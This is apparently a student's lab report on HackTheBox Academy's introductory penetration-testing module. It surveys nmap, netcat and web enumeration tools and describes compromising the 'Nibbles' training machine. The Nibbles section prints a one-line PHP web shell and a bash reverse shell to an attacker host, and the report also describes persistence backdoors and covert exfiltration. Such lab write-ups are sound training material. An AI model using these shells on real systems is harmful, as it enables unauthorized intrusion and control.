Fundamentals of Pentesting

index

Student: Tapiwanashe Mlambo
Module: HackTheBox Academy - Getting Started
Achievement Link: https://academy.hackthebox.com/achievement/1918408/77

1.0 Executive Summary

This laboratory exercise documents the completion of the HackTheBox Academy “Getting Started” module, which serves as a comprehensive introduction to penetration testing fundamentals. The module provided hands-on experience with essential cybersecurity concepts, tools, and methodologies that form the foundation of ethical hacking and security assessment practices.

The lab covered critical areas including penetration testing distributions, service enumeration, web application security, exploit identification, privilege escalation, and file transfer techniques. The culminating practical exercise involved the complete compromise of the “Nibbles” machine, demonstrating the application of learned concepts in a real-world scenario.

2.0 Learning Objectives

Upon completion of this laboratory exercise, the following competencies were developed:

Understanding of information security principles and the CIA triad
Proficiency in penetration testing distribution setup and configuration
Mastery of essential penetration testing tools and utilities
Competence in network service scanning and enumeration techniques
Skills in web application reconnaissance and vulnerability identification
Knowledge of shell types and their practical applications
Understanding of privilege escalation techniques
Proficiency in secure file transfer methods
Practical experience in end-to-end penetration testing methodology

3.0 Information Security Foundation

3.1 Core Principles

Information security fundamentally revolves around protecting the confidentiality, integrity, and availability (CIA triad) of data and systems. This laboratory reinforced these principles through practical application:

Confidentiality: Ensuring unauthorized users cannot access sensitive information
Integrity: Maintaining data accuracy and preventing unauthorized modifications
Availability: Ensuring systems and data remain accessible to authorized users

3.2 Penetration Testing Context

Penetration testing serves as a proactive security measure, simulating real-world attacks to identify vulnerabilities before malicious actors can exploit them. This ethical hacking approach provides organizations with actionable insights to strengthen their security posture.

4.0 Laboratory Infrastructure Setup

4.1 Penetration Testing Distribution

The laboratory began with configuring a proper penetration testing environment using Parrot OS. Key considerations included:

Virtualization Strategy: Implementing proper isolation between virtual machines to prevent cross-contamination
Resource Allocation: Ensuring adequate system resources for effective tool operation
Network Configuration: Establishing secure communication channels while maintaining isolation
Tool Verification: Confirming the availability and functionality of essential penetration testing utilities

4.2 Home Lab Environment

A structured home laboratory environment was established following industry best practices:

Segmented Networks: Creating isolated network segments for different testing scenarios
Documentation Standards: Implementing consistent documentation practices for reproducibility
Backup Procedures: Establishing regular backup protocols to prevent data loss
Update Management: Maintaining current tool versions and security patches

5.0 Organizational Methodology

5.1 Documentation Framework

Effective penetration testing requires meticulous documentation. The following organizational structure was implemented:

1
Project Root/
2
├── Evidence/
3
│   ├── Screenshots/
4
│   ├── Network_Captures/
5
│   └── Log_Files/
6
├── Credentials/
7
│   ├── Discovered/
8
│   └── Generated/
9
├── Scan_Results/
10
│   ├── Network_Scans/
11
│   ├── Web_Scans/
12
│   └── Vulnerability_Scans/
13
├── Scope/
14
│   ├── Target_Lists/
15
│   └── Rules_of_Engagement/
16
└── Reports/
17
    ├── Draft/
18
    └── Final/

5.2 Knowledge Management Tools

Several note-taking and knowledge management platforms were evaluated:

Cherrytree: Hierarchical note-taking with rich text formatting capabilities
Notion: Collaborative workspace with database functionality
GitBook: Version-controlled documentation with team collaboration features

6.0 Network Connectivity and Security

6.1 VPN Configuration

Virtual Private Network (VPN) connectivity ensures secure communication between the testing environment and target systems. Key concepts covered included:

Client-based VPNs: Traditional VPN clients requiring software installation
SSL VPNs: Browser-based VPN access through secure web portals
Connection Verification: Testing connectivity and ensuring proper routing
Traffic Analysis: Monitoring VPN traffic for anomalies or security concerns

7.0 Fundamental Penetration Testing Concepts

7.1 Shell Types and Applications

Understanding different shell types is crucial for maintaining access to compromised systems:

7.1.1 Reverse Shells

Mechanism: Target system initiates connection back to attacker
Advantages: Bypasses outbound firewall restrictions
Use Cases: Environments with restrictive inbound filtering

7.1.2 Bind Shells

Mechanism: Target system listens on a specific port for incoming connections
Advantages: Direct connection establishment
Limitations: Requires open inbound ports on target

7.1.3 Web Shells

Mechanism: Web-based interface for command execution
Advantages: Utilizes existing web server infrastructure
Stealth: Often harder to detect than traditional shells

8.0 Essential Tool Proficiency

8.1 Secure Shell (SSH)

SSH provides encrypted remote access capabilities essential for secure administration:

# Basic SSH connection
ssh username@target_ip

# SSH with specific port
ssh -p 2222 username@target_ip

# SSH with key-based authentication
ssh -i private_key username@target_ip

8.2 Netcat - The Network Swiss Army Knife

Netcat enables versatile network communication and troubleshooting:

# Basic port scanning
nc -nv target_ip port_range

# Banner grabbing
nc target_ip port

# Reverse shell listener
nc -nlvp local_port

8.3 Terminal Multiplexer (Tmux)

Tmux facilitates efficient multi-session terminal management:

# Create new session
tmux new-session -d -s session_name

# Attach to existing session
tmux attach-session -t session_name

# List active sessions
tmux list-sessions

8.4 Vim Text Editor

Vim proficiency enhances productivity in command-line environments:

Modal Editing: Understanding insert, command, and visual modes
Navigation: Efficient cursor movement and text manipulation
Search and Replace: Pattern matching and bulk text modifications
Configuration: Customizing editor behavior through .vimrc

9.0 Service Discovery and Enumeration

9.1 Network Mapping with Nmap

Network reconnaissance forms the foundation of any penetration test. Nmap provides comprehensive port scanning and service enumeration capabilities:

9.1.1 Basic Scanning Techniques

# TCP SYN scan (default)
nmap -sS target_ip

# UDP scan
nmap -sU target_ip

# Comprehensive scan
nmap -sS -sU -O -sV -sC target_ip

9.1.2 Advanced Enumeration

# Script scanning
nmap --script vuln target_ip

# Aggressive scanning
nmap -A target_ip

# Stealth scanning
nmap -sS -f -D decoy_ip target_ip

9.2 Service Fingerprinting

Identifying specific service versions enables targeted vulnerability research:

Banner Grabbing: Extracting service identification strings
Version Detection: Determining exact software versions
Operating System Fingerprinting: Identifying target platform characteristics

10.0 Web Application Reconnaissance

10.1 Directory and File Discovery

Web applications often contain hidden resources that provide attack vectors:

10.1.1 Gobuster Implementation

# Directory brute-forcing
gobuster dir -u http://target_ip -w /path/to/wordlist

# DNS subdomain enumeration
gobuster dns -d target_domain -w /path/to/wordlist

# Virtual host discovery
gobuster vhost -u http://target_ip -w /path/to/wordlist

10.1.2 FFUF (Fuzz Faster U Fool)

# Directory fuzzing
ffuf -u http://target_ip/FUZZ -w /path/to/wordlist

# Parameter fuzzing
ffuf -u http://target_ip/page?FUZZ=value -w /path/to/wordlist

# POST data fuzzing
ffuf -u http://target_ip/login -d "username=admin&password=FUZZ" -w /path/to/wordlist

10.2 HTTP Analysis Techniques

Understanding HTTP responses provides valuable reconnaissance information:

Status Code Interpretation: Analyzing 200, 403, 404, and other response codes
Header Analysis: Examining server headers for technology identification
SSL/TLS Certificate Analysis: Extracting domain and organizational information

11.0 Vulnerability Identification and Exploitation

11.1 Public Exploit Research

Leveraging existing exploits accelerates the penetration testing process:

11.1.1 Exploit Databases

Exploit-DB: Comprehensive repository of public exploits
CVE Database: Common Vulnerabilities and Exposures tracking
Metasploit Framework: Automated exploitation platform

11.1.2 Exploit Verification Process

Vulnerability Confirmation: Verifying target susceptibility
Exploit Customization: Adapting exploits for specific environments
Payload Selection: Choosing appropriate post-exploitation payloads
Execution Monitoring: Tracking exploit success and failure conditions

11.2 Manual Exploitation Techniques

Understanding manual exploitation deepens comprehension of vulnerability mechanics:

Code Analysis: Reviewing exploit source code for understanding
Modification Techniques: Adapting exploits for specific scenarios
Debugging Methods: Troubleshooting failed exploitation attempts

12.0 Post-Exploitation Activities

12.1 Privilege Escalation Strategies

Gaining elevated privileges expands attack capabilities and demonstrates impact:

12.1.1 Linux Privilege Escalation

Common techniques include:

SUID Binary Exploitation: Leveraging misconfigured SUID programs
Kernel Exploits: Exploiting operating system vulnerabilities
Service Misconfigurations: Abusing improperly configured services
Credential Harvesting: Extracting stored passwords and keys

12.1.2 Enumeration Scripts

Automated enumeration tools accelerate privilege escalation discovery:

# LinEnum script
./LinEnum.sh

# Linux Exploit Suggester
./linux-exploit-suggester.sh

# LinPEAS
./linpeas.sh

12.2 Persistence Mechanisms

Maintaining access to compromised systems enables continued assessment:

Backdoor Installation: Creating alternative access methods
Service Modification: Altering existing services for persistence
Scheduled Task Creation: Implementing recurring access mechanisms

13.0 Data Exfiltration and File Transfer

13.1 File Transfer Techniques

Moving data between systems requires understanding multiple transfer methods:

13.1.1 HTTP-Based Transfers

# wget download
wget http://attacker_ip/file

# cURL download
curl -O http://attacker_ip/file

# Python HTTP server
python3 -m http.server 8000

13.1.2 Secure Copy Protocol (SCP)

# File upload to remote system
scp local_file username@remote_ip:/remote/path/

# File download from remote system
scp username@remote_ip:/remote/file local_path/

13.1.3 Base64 Encoding

# Encode file for transfer
base64 file > encoded_file

# Decode received file
base64 -d encoded_file > original_file

13.2 Steganography and Covert Channels

Advanced file transfer techniques help evade detection:

Image Steganography: Hiding data within image files
DNS Tunneling: Using DNS queries for data transmission
ICMP Tunneling: Leveraging ping packets for communication

14.0 Practical Application: Nibbles Machine

14.1 Initial Reconnaissance

The Nibbles machine served as a comprehensive practical exercise combining all learned techniques:

14.1.1 Port Scanning Results

# Nmap scan results
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH (protocol 2.0)
80/tcp open  http    Apache httpd

14.1.2 Service Enumeration

SSH Service: Standard secure shell implementation
HTTP Service: Apache web server hosting web applications

14.2 Web Application Discovery

14.2.1 Initial Web Reconnaissance

The web server revealed minimal information through standard browsing, necessitating deeper enumeration:

Source Code Analysis: Examining HTML source for hidden comments
Directory Enumeration: Systematic discovery of hidden directories
Technology Fingerprinting: Identifying underlying web technologies

14.2.2 Nibbleblog Discovery

Directory enumeration revealed the /nibbleblog/ directory containing a content management system:

CMS Identification: Recognizing Nibbleblog installation
Version Determination: Establishing specific software version
Default Configuration Analysis: Identifying potential security weaknesses

14.3 Initial Access Achievement

14.3.1 Authentication Bypass

The Nibbleblog installation utilized default or weak credentials:

Credential Guessing: Systematic password attempts
Default Account Analysis: Testing common username/password combinations
Brute Force Considerations: Balancing speed with detection avoidance

14.3.2 Administrative Access

Successful authentication provided administrative access to the CMS:

Interface Exploration: Understanding available functionality
Upload Capabilities: Identifying file upload mechanisms
Security Control Assessment: Evaluating implemented protections

14.4 Code Execution and Shell Access

14.4.1 File Upload Exploitation

The CMS plugin upload functionality enabled arbitrary code execution:

1
<?php
2
system($_GET['cmd']);
3
?>

14.4.2 Reverse Shell Implementation

Upgrading from web shell to reverse shell provided enhanced capabilities:

# Reverse shell payload
bash -i >& /dev/tcp/attacker_ip/port 0>&1

14.5 Privilege Escalation

14.5.1 System Enumeration

Initial access provided limited user privileges requiring escalation:

User Context Analysis: Understanding current privilege level
System Configuration Review: Identifying potential escalation vectors
File Permission Auditing: Discovering writable system files

14.5.2 Sudoers Misconfiguration

System analysis revealed sudoers misconfigurations enabling privilege escalation:

# Sudoers entry allowing specific command execution
nibbler ALL=(ALL:ALL) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

14.5.3 Root Access Achievement

Exploiting the sudoers misconfiguration provided root access:

Script Modification: Altering the monitor.sh script
Payload Insertion: Adding privilege escalation commands
Execution: Running the script with sudo privileges
Verification: Confirming root access acquisition

14.6 Knowledge Check Validation

The independent knowledge check exercise tested comprehensive understanding without guided instruction:

Autonomous Problem Solving: Applying learned techniques independently
Creative Thinking: Developing novel approaches to challenges
Persistence: Maintaining effort through difficult enumeration phases
Documentation: Recording discovery process for future reference

15.0 Lessons Learned and Challenges

15.1 Technical Insights

The laboratory experience provided several key insights:

Enumeration Criticality: Thorough enumeration often reveals the most effective attack vectors
Tool Integration: Combining multiple tools provides comprehensive coverage
Patience Requirements: Effective penetration testing requires methodical persistence
Documentation Value: Detailed documentation enables knowledge retention and sharing

15.2 Skill Development Areas

Areas requiring continued development include:

Advanced Enumeration Techniques: Exploring sophisticated reconnaissance methods
Custom Exploit Development: Creating tailored exploits for specific vulnerabilities
Steganography Applications: Implementing covert communication channels
Automated Tool Development: Creating custom scripts for specific testing scenarios

15.3 Time Management Considerations

The complexity of the module exceeded initial time estimates, highlighting the importance of:

Realistic Planning: Allowing adequate time for thorough testing
Incremental Progress: Breaking complex tasks into manageable components
Learning Integration: Balancing speed with knowledge retention
Quality Focus: Prioritizing understanding over completion speed

16.0 Conclusion

The HackTheBox Getting Started module provided an exceptional introduction to penetration testing fundamentals. The comprehensive coverage of essential concepts, combined with hands-on practical application, established a solid foundation for advanced cybersecurity studies.

The progression from basic tool usage through complete system compromise demonstrated the interconnected nature of penetration testing activities. Each component built upon previous knowledge, culminating in the successful compromise of the Nibbles machine.

The laboratory experience emphasized the critical importance of methodical enumeration, persistent investigation, and comprehensive documentation. These skills extend beyond technical proficiency to encompass the analytical mindset essential for effective cybersecurity practice.

The challenging nature of the module, particularly the independent knowledge check, reinforced the necessity of continuous learning and adaptation in the rapidly evolving cybersecurity landscape. The satisfaction derived from overcoming complex challenges validated the educational approach and motivated continued advancement in the field.

This foundational experience establishes the groundwork for advanced penetration testing studies and practical cybersecurity application. The combination of theoretical understanding and hands-on experience provides confidence for tackling more complex security challenges in future endeavors.

17.0 References and Resources

17.1 Primary Learning Resources

HackTheBox Academy Getting Started Module
Official tool documentation and manual pages
Industry-standard penetration testing methodologies

17.2 Additional Study Materials

OWASP Testing Guide
NIST Cybersecurity Framework
SANS Penetration Testing Guidelines
CVE Database and Exploit-DB repositories

17.3 Tool Documentation

Nmap Network Discovery and Security Auditing
Netcat Network Utility Documentation
Vim Editor User Manual
Tmux Terminal Multiplexer Guide